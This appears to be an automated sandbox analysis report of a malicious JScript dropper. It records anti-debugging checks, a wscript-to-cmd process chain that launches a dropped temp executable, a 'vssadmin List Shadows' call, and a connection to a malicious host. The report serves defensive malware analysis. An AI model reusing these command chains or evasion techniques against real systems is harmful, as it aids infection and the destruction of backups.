Source: wscript.exe, 00000001.00000002.8654600004.0000000005440000.00000002.sdmp, rad8AE2B.tmp, 00000006.00000002.9859328234.00000000039B0000.00000002.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: rad8AE2B.tmp, 00000006.00000002.9869833108.0000000003E4E000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-pvhd-parser_31bf3856ad364e35_10.0.17134.1_none_6efae9ae437759d8.manifestaa\
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-d..ers-vmswitch-common_31bf3856ad364e35_10.0.17134.1_none_156e07c0687fe777.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mum\*/
Source: rad8AE2B.tmp, 00000006.00000002.9881647891.0000000004068000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat
Source: rad8AE2B.tmp, 00000006.00000002.9869833108.0000000003E4E000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.17134.1_none_14929ba5ccea66b9.manifest1f919\A
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mumtH
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-emulatedstorage_31bf3856ad364e35_10.0.17134.1_none_c0dbf3b2f0877a05.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-emulatedstorage_31bf3856ad364e35_10.0.17134.48_none_d4ed173f61801406\
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vpmem.resources_31bf3856ad364e35_10.0.17134.1_en-us_83c966966d5f8cf2\
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mumt
Program exit pointsShow sources
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpAPI call chain: ExitProcess graph end nodegraph_6-47192
Queries a list of all running processesShow sources
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Windows\SysWOW64\wscript.exeSystem information queried: KernelDebuggerInformationJump to behavior
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)Show sources
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_00449089 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,_memset,GetTickCount,GetTickCount,Heap32ListFirst,_memset,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,Process32Next,GetTickCount,GetTickCount,Thread32First,Thread32Next,GetTickCount,GetTickCount,Module32First,Module32Next,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,6_2_00449089
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_0041A13C LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetP6_2_0041A13C
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_005664B0 TlsGetValue,TlsGetValue,TlsGetValue,TlsGetValue,CreateWaitableTimerA,SetWaitableTimer,WaitForMultipleObjects,CloseHandle,Sleep,CloseHandle,TlsGetValue,ResetEvent,__CxxThrowException@8,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,6_2_005664B0
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_00550F9A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00550F9A
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpMemory protected: page readonly | page write copy | page execute and read and write | page execute and write copy | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 92.61.149.127 80Jump to behavior
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c C:\Users\user~1\AppData\Local\Temp\rad8AE2B.tmpJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp C:\Users\user~1\AppData\Local\Temp\rad8AE2B.tmpJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpProcess created: C:\Windows\System32\vssadmin.exe C:\Windows\system32\vssadmin.exe List ShadowsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: rad8AE2B.tmp, 00000006.00000002.9832428740.0000000000FB0000.00000002.sdmpBinary or memory string: Program Manager
Source: rad8AE2B.tmp, 00000006.00000002.9832428740.0000000000FB0000.00000002.sdmpBinary or memory string: Shell_TrayWnd
Source: rad8AE2B.tmp, 00000006.00000002.9832428740.0000000000FB0000.00000002.sdmpBinary or memory string: Progman
Source: rad8AE2B.tmp, 00000006.00000002.9832428740.0000000000FB0000.00000002.sdmpBinary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpQueries volume information: C:\ VolumeInformationJump to behavior
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_0054E1CE GetSystemTimeAsFileTime,__aulldiv,6_2_0054E1CE
Contains functionality to query the account / user nameShow sources
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_004176EB _memset,GetUserNameW,6_2_004176EB
Contains functionality to query time zone informationShow sources
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_00560999 __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,6_2_00560999
Contains functionality to query windows versionShow sources
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_00449089 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,_memset,GetTickCount,GetTickCount,Heap32ListFirst,_memset,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,Process32Next,GetTickCount,GetTickCount,Thread32First,Thread32Next,GetTickCount,GetTickCount,Module32First,Module32Next,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,6_2_00449089
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behaviorgraph top1 signatures2 2 Behavior Graph ID: 773096 Sample: 21#U043e #U0437#U0430#U043a#U0430#U0437#U0435.js Startdate: 29/01/2019 Architecture: WINDOWS Score: 100 55 May disable shadow drive data (uses vssadmin) 2->55 57 Downloads files with wrong headers with respect to MIME Content-Type 2->57 59 May check the online IP address of the machine 2->59 61 4 other signatures 2->61 9 wscript.exe 15 2->9         started        14 csrss.exe 2 2->14         started        16 csrss.exe 2->16         started        process3 dnsIp4 53 poshpebbles.net 92.61.149.127, 50024, 80 SERVAGEDE European Union 9->53 45 C:\Users\user~1\AppData\...\rad8AE2B.tmp, PE32 9->45 dropped 73 System process connects to network (likely due to code injection or exploit) 9->73 75 JScript performs obfuscated calls to suspicious functions 9->75 77 Deletes itself after installation 9->77 18 cmd.exe